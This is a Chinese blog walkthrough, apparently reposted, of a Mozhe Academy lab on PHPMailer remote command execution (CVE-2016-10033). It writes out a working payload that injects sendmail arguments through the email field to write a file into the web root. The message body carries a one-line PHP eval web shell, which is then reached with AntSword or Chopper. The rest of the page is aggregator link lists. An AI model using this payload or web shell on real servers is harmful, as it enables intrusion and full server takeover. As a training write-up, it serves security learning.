当前位置:网站首页>墨者学院-PHPMailer远程命令执行漏洞溯源
墨者学院-PHPMailer远程命令执行漏洞溯源
2022-07-04 07:40:00 【Lyswbb】
拿到靶场之后点击访问


工具
分享一个小工具,用来爬取相关的url Link Gopher

可以看到有用的就一个mail.php

进入之后来到一个邮件测试页面,很明显这里是一个功能点

phpmailer介绍
PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)
burp抓包,更改email处payload为
"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/1.php @aaa.com更改message处payload为
<?php @eval($_POST[cmd]);?>
然后访问http://124.70.71.251:44768/1.php,使用蚁剑或者菜刀连接即可

边栏推荐
- Système de surveillance zabbix contenu de surveillance personnalisé
- Mysql database - function constraint multi table query transaction
- 手写简易版flexible.js以及源码分析
- Advanced MySQL: Basics (5-8 Lectures)
- [freertos] freertos Learning notes (7) - written freertos bidirectionnel Link LIST / source analysis
- Devops Practice Guide - reading notes (long text alarm)
- Handwritten easy version flexible JS and source code analysis
- socket inet_ pton() inet_ Ntop() function (a new network address translation function, which converts the expression format and numerical format to each other. The old ones are inet_aton(), INET_ ntoa
- 线性代数1.1
- This monitoring system can monitor the turnover intention and fishing all, and the product page has 404 after the dispute appears
猜你喜欢

In the era of low code development, is it still needed?

Zephyr learning notes 1, threads

window上用.bat文件启动项目

Oceanbase is the leader in the magic quadrant of China's database in 2021

I was pressed for the draft, so let's talk about how long links can be as efficient as short links in the development of mobile terminals

Comparison between applet framework and platform compilation

Rhcsa day 3

Flask 常用组件

The idea of implementing charts chart view in all swiftui versions (1.0-4.0) was born

MySQL中的文本处理函数整理,收藏速查
随机推荐
Node foundation ~ node operation
Docker install MySQL
Introduction to neural network (Part 2)
L1-026 I love gplt (5 points)
神经网络入门(下)
Project 1 household accounting software (goal + demand description + code explanation + basic fund and revenue and expenditure details record + realization of keyboard access)
The idea of implementing charts chart view in all swiftui versions (1.0-4.0) was born
MySQL 数据库 - 函数 约束 多表查询 事务
[FreeRTOS] FreeRTOS learning notes (7) - handwritten FreeRTOS two-way linked list / source code analysis
墨者学院-Webmin未经身份验证的远程代码执行
Oracle stored procedures and functions
L1-023 output gplt (20 points)
Application of isnull in database query
rapidjson读写json文件
Thesis learning -- time series similarity query method based on extreme point characteristics
The cloud native programming challenge ended, and Alibaba cloud launched the first white paper on application liveliness technology in the field of cloud native
21 examples of strategic goals to promote the rapid development of your company
Zhanrui tankbang | jointly build, cooperate and win-win zhanrui core ecology
Would you like to go? Go! Don't hesitate if you like it
One of the general document service practice series